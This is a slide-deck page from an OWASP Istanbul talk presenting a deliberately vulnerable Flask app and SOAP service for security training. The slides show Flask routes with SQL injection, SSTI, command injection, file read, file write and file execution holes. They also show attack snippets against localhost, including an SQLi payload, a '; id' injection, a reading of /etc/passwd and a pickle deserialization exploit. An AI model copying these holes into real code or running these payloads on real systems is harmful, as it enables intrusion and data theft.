Uploaded byanilyelken
819 views

OWASP-VulnerableFlaskApp

The document describes a vulnerable Flask app created by OWASP to demonstrate various web application vulnerabilities. It provides examples of how SQL injection, HTML injection, server-side template injection, command injection, information disclosure, file upload vulnerabilities and other issues can be exploited in a Flask app. It also summarizes a vulnerable SOAP service that demonstrates similar vulnerabilities like local file inclusion, SQL injection, and deserialization attacks.

Embed presentation

Download to read offline
OWASP – Vulnerable Flask App https://owasp.org/www-project-vulnerable-flask-app/ https://github.com/anil-yelken/Vulnerable-Flask-App Anıl Yelken 19.11.2022 OWASP İstanbul
OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload
OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP SQL INJECTION
OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
OWASP – VULNERABLE FLASK APP HTML INJECTION
OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
OWASP – VULNERABLE FLASK APP SSTI
OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
OWASP – VULNERABLE FLASK APP COMMAND INJECTION
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP LFI
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
OWASP – VULNERABLE FLASK APP BRUTE FORCE
OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
OWASP – VULNERABLE FLASK APP FILE UPLOAD
OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
OWASP – VULNERABLE FLASK APP DOS
OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
OWASP – VULNERABLE FLASK APP
VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id
VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken

More Related Content

PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
XSS Magic tricks
byGarethHeyes
 
PPTX
SSRF For Bug Bounties
byOWASP Nagpur
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PDF
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
PPTX
SSRF exploit the trust relationship
byn|u - The Open Security Community
 
PDF
Recon for Bug Bounty by Agnibha Dutta.pdf
bynull - The Open Security Community
 
Waf bypassing Techniques
byAvinash Thapa
 
XSS Magic tricks
byGarethHeyes
 
SSRF For Bug Bounties
byOWASP Nagpur
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
SSRF exploit the trust relationship
byn|u - The Open Security Community
 
Recon for Bug Bounty by Agnibha Dutta.pdf
bynull - The Open Security Community
 

What's hot

PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PPTX
Android Application Penetration Testing - Mohammed Adam
byMohammed Adam
 
PDF
java.io - streams and files
byMarcello Thiry
 
PDF
PHP unserialization vulnerabilities: What are we missing?
bySam Thomas
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PDF
Exploiting Deserialization Vulnerabilities in Java
byCODE WHITE GmbH
 
PDF
Alphorm.com Formation Hacking et Sécurité 2020 (4of4) : Attaques AD et Web
byAlphorm
 
PDF
REST API Pentester's perspective
bySecuRing
 
PPTX
Understanding Cross-site Request Forgery
byDaniel Miessler
 
PDF
Getting started with Spring Security
byKnoldus Inc.
 
PDF
Talking About SSRF,CRLF
byn|u - The Open Security Community
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PDF
Python Flask Tutorial For Beginners | Flask Web Development Tutorial | Python...
byEdureka!
 
PPTX
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PDF
Broken access controls
byAkansha Kesharwani
 
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
PDF
Owasp top 10
byYasserElsnbary
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PPTX
Hashicorp Vault ppt
byShrey Agarwal
 
PDF
Spring Security
byKnoldus Inc.
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
Android Application Penetration Testing - Mohammed Adam
byMohammed Adam
 
java.io - streams and files
byMarcello Thiry
 
PHP unserialization vulnerabilities: What are we missing?
bySam Thomas
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
Exploiting Deserialization Vulnerabilities in Java
byCODE WHITE GmbH
 
Alphorm.com Formation Hacking et Sécurité 2020 (4of4) : Attaques AD et Web
byAlphorm
 
REST API Pentester's perspective
bySecuRing
 
Understanding Cross-site Request Forgery
byDaniel Miessler
 
Getting started with Spring Security
byKnoldus Inc.
 
Talking About SSRF,CRLF
byn|u - The Open Security Community
 
Attacking thru HTTP Host header
bySergey Belov
 
Python Flask Tutorial For Beginners | Flask Web Development Tutorial | Python...
byEdureka!
 
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Broken access controls
byAkansha Kesharwani
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
Owasp top 10
byYasserElsnbary
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
Hashicorp Vault ppt
byShrey Agarwal
 
Spring Security
byKnoldus Inc.
 

Similar to OWASP-VulnerableFlaskApp

PDF
Intro to Jinja2 Templates - San Francisco Flask Meetup
byAlan Hamlett
 
PPTX
PyCon Canada 2015 - Is your python application secure
byIMMUNIO
 
PDF
Is your python application secure? - PyCon Canada - 2015-11-07
byFrédéric Harper
 
PDF
Flask Introduction - Python Meetup
byAreski Belaid
 
PDF
Flask patterns
byit-people
 
PDF
Jinja2 Templates - San Francisco Flask Meetup
byAlan Hamlett
 
PDF
«(Без)опасный Python», Иван Цыганов, Positive Technologies
byit-people
 
PDF
(Un)safe Python
byIvan Tsyganov
 
PPTX
Flask
byMamta Kumari
 
PDF
Python Web Applications With Flask Handon Your Flask Skills2024 Jeffrey Leon ...
bykeyroreagan
 
PDF
Flask jwt authentication tutorial
byKaty Slemon
 
PPTX
Flask restfulservices
byMarcos Lin
 
PPTX
Flask-RESTPlusで便利なREST API開発 | Productive RESTful API development with Flask-...
byAkira Tsuruda
 
PDF
Introduction to Flask Micro Framework
byMohammad Reza Kamalifard
 
PDF
Testing python security PyCon IE
byJose Manuel Ortega Candel
 
KEY
LvivPy - Flask in details
byMax Klymyshyn
 
PDF
Sichere Web-Applikationen am Beispiel von Django
byMarkus Zapke-Gründemann
 
PDF
Filling the flask
byJason Myers
 
PPTX
Flask-Python
byTriloki Gupta
 
PDF
BUILDING MODERN PYTHON WEB FRAMEWORKS USING FLASK WITH NEIL GREY
byCodeCore
 
Intro to Jinja2 Templates - San Francisco Flask Meetup
byAlan Hamlett
 
PyCon Canada 2015 - Is your python application secure
byIMMUNIO
 
Is your python application secure? - PyCon Canada - 2015-11-07
byFrédéric Harper
 
Flask Introduction - Python Meetup
byAreski Belaid
 
Flask patterns
byit-people
 
Jinja2 Templates - San Francisco Flask Meetup
byAlan Hamlett
 
«(Без)опасный Python», Иван Цыганов, Positive Technologies
byit-people
 
(Un)safe Python
byIvan Tsyganov
 
Flask
byMamta Kumari
 
Python Web Applications With Flask Handon Your Flask Skills2024 Jeffrey Leon ...
bykeyroreagan
 
Flask jwt authentication tutorial
byKaty Slemon
 
Flask restfulservices
byMarcos Lin
 
Flask-RESTPlusで便利なREST API開発 | Productive RESTful API development with Flask-...
byAkira Tsuruda
 
Introduction to Flask Micro Framework
byMohammad Reza Kamalifard
 
Testing python security PyCon IE
byJose Manuel Ortega Candel
 
LvivPy - Flask in details
byMax Klymyshyn
 
Sichere Web-Applikationen am Beispiel von Django
byMarkus Zapke-Gründemann
 
Filling the flask
byJason Myers
 
Flask-Python
byTriloki Gupta
 
BUILDING MODERN PYTHON WEB FRAMEWORKS USING FLASK WITH NEIL GREY
byCodeCore
 

Recently uploaded

PDF
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
PDF
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
PDF
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
PPTX
Jisc Equipment Data Service Update Workshop 3 December 2025
byJisc
 
PDF
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
PDF
Taxonomy Alignment for SDG Tagging - ASHA Case Study
byEnterprise Knowledge
 
PDF
Certified AI-Native Foundations Professional.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
PDF
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
PDF
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
PDF
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
PDF
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
PDF
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
PDF
Certified AI-Empowered SAFe Release Train Engineer.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
PDF
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
PDF
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
PDF
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
PDF
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
PDF
Certified AI-Empowered SAFe 6 Scrum Master.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
PDF
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
PPTX
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
Jisc Equipment Data Service Update Workshop 3 December 2025
byJisc
 
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
Taxonomy Alignment for SDG Tagging - ASHA Case Study
byEnterprise Knowledge
 
Certified AI-Native Foundations Professional.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
Agentic-Document-Extraction-2026-Presentation.pdf
byTamanna
 
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
Certified AI-Empowered SAFe Release Train Engineer.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
Certified AI-Empowered SAFe 6 Scrum Master.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 

OWASP-VulnerableFlaskApp

  • 1.
    OWASP – VulnerableFlask App https://owasp.org/www-project-vulnerable-flask-app/ https://github.com/anil-yelken/Vulnerable-Flask-App Anıl Yelken 19.11.2022 OWASP İstanbul
  • 2.
    OWASP – VULNERABLEFLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload
  • 3.
    OWASP – VULNERABLEFLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
  • 4.
    OWASP – VULNERABLEFLASK APP SQL INJECTION
  • 5.
    OWASP – VULNERABLEFLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
  • 6.
    OWASP – VULNERABLEFLASK APP HTML INJECTION
  • 7.
    OWASP – VULNERABLEFLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
  • 8.
    OWASP – VULNERABLEFLASK APP SSTI
  • 9.
    OWASP – VULNERABLEFLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
  • 10.
    OWASP – VULNERABLEFLASK APP COMMAND INJECTION
  • 11.
    OWASP – VULNERABLEFLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
  • 12.
    OWASP – VULNERABLEFLASK APP INFORMATION DISCLOSURE
  • 13.
    OWASP – VULNERABLEFLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
  • 14.
    OWASP – VULNERABLEFLASK APP LFI
  • 15.
    OWASP – VULNERABLEFLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
  • 16.
    OWASP – VULNERABLEFLASK APP INFORMATION DISCLOSURE
  • 17.
    OWASP – VULNERABLEFLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
  • 18.
    OWASP – VULNERABLEFLASK APP BRUTE FORCE
  • 19.
    OWASP – VULNERABLEFLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
  • 20.
    OWASP – VULNERABLEFLASK APP FILE UPLOAD
  • 21.
    OWASP – VULNERABLEFLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
  • 22.
    OWASP – VULNERABLEFLASK APP DOS
  • 23.
    OWASP – VULNERABLEFLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
  • 24.
    OWASP – VULNERABLEFLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
  • 25.
  • 26.
    VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQLInjection -Information Disclosure -Command Injection -Brute Force -Deserialization
  • 27.
    VULNERABLE SOAP SERVICE LFI fromsuds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
  • 28.
    VULNERABLE SOAP SERVICE SQLINJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
  • 29.
    VULNERABLE SOAP SERVICE INFORMATIONDISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
  • 30.
    VULNERABLE SOAP SERVICE COMMANDINJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id
  • 31.
    VULNERABLE SOAP SERVICE BRUTEFORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
  • 32.
    VULNERABLE SOAP SERVICE DESERIALIZATION importsocket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
  • 33.
    ŞIRKET SOSYAL MEDYAHESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
  • 34.
    KIŞISEL SOSYAL MEDYA HESAPLARIM •https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken